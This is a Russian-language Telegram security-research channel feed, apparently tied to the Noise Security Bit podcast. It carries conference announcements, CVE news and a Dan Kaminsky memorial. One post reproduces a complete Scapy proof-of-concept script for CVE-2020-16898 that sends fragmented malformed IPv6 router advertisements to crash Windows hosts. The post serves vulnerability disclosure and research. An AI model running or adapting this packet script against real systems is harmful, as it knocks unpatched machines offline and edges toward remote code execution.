Noise Security Bit
621 subscribers
115 photos
3 videos
1 file
349 links
новости нерегулярного подкаста о жизни ресечеров по обе стороны океана
https://www.youtube.com/NoiseSecurityBit
Download Telegram
Уже через 5 минут начнется конференция r2con 2020 в онлайн формате, посвященная различным темам, связанным тем или иным образом с reverse engineering.

Отдельно хотелось бы отметить доклады Codename: flip.re, From hardware to zero-day от Olivia, Semi-automatic Code Deobfuscation, ESIL side-channel simulation и конечно же серию докладов по новым фичам, созданных в рамках GSoC 2020, под руководством гостя одного из выпусков нашего подкаста - Xvilka.

Стрим: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
Расписание: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Сайт: https://rada.re/con/2020/
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability

https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html

https://blog.pi3.com.pl/?p=780

BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
send(p)
Найдено несколько уязвимостей в Jitsi Meet:

- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)

https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400

PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
Стали доступны слайды с прошедшей конференции Black Hat Europe 2020 https://www.blackhat.com/eu-20/briefings/schedule/
Видео докладов с Black Hat US 2020 доступны для просмотра онлайн! 🔥

https://www.youtube.com/playlist?list=PLH15HpR5qRsXE_4kOSy_SXwFkFQre4AV_
Forwarded from ZeroNights
ZeroNights в поисках лучших докладов!

Мы ищем практиков и исследователей ИБ, готовых поделиться результатами своей работы в самых разных областях.

На ZeroNights 2021 вы можете выступить с 15-, 30- и 45-минутным докладом. А если представите эксклюзивное 45-минутное исследование в области Offensive Security, то получите денежное вознаграждение.

Подать заявку можно на сайте.
Проблема выбора 🤔🤑

Zerodium $250k за Exchange RCE
https://zerodium.com/program.html

Microsoft $0 ... $15k? ... $20k?
https://www.microsoft.com/en-us/msrc/bounty
Интересен был бы регулярный голосовой чат на нашем канале?
Final Results
53%
звучит интригующе 🍿
47%
что за дичь, в топку 🤦‍♂️
Forwarded from ZeroNights
Известны первые утвержденные доклады ZN 2021! Рассказываем о тех, которые войдут в основную программу.

1. Эксплуатация checkm8 с неизвестным SecureROM на примере чипа T2
Алексей Коврижных покажет продвинутый способ дампинга прошивки, который будет работать на устройствах с WXN, на примере T2.

2. LPE в Ring -3 / Intel ME

Дмитрий Турченков раскроет тайны эксплуатации багов в системном компоненте ME через механизм IPC.

3. Hacking KaiOS

Алексей Россовский расскажет о возможных векторах атак на KaiOS, включая сценарии удаленного выполнения кода, повышения привилегий и изучения новых уязвимостей.

Читать подробнее о докладах
🤦‍♂️🙀
Forwarded from ZeroNights
Юбилейные события отправляют нас к истокам. Когда-то в истории ZeroNights воркшопы были традиционными активностями, так почему бы нам не вернуть эту традицию и не включить их в программу? 

Мы принимаем заявки на проведение практических воркшопов, где вы сможете поделиться своми идеями и наработками! 

Подать заявку и задать вопросы по проведению вы можете по почте [email protected].

В письме укажите время продолжительности планируемого вами воркшопа и минимальные требования к месту проведения.
В возрасте 42-х лет ушел из жизни Dan Kaminsky, известный ресечер продемонстрировавший миру уязвимости в DNS и сети Интернет в целом. Твои исследования останутся в нашей памяти навсегда.

R.I.P. my friend!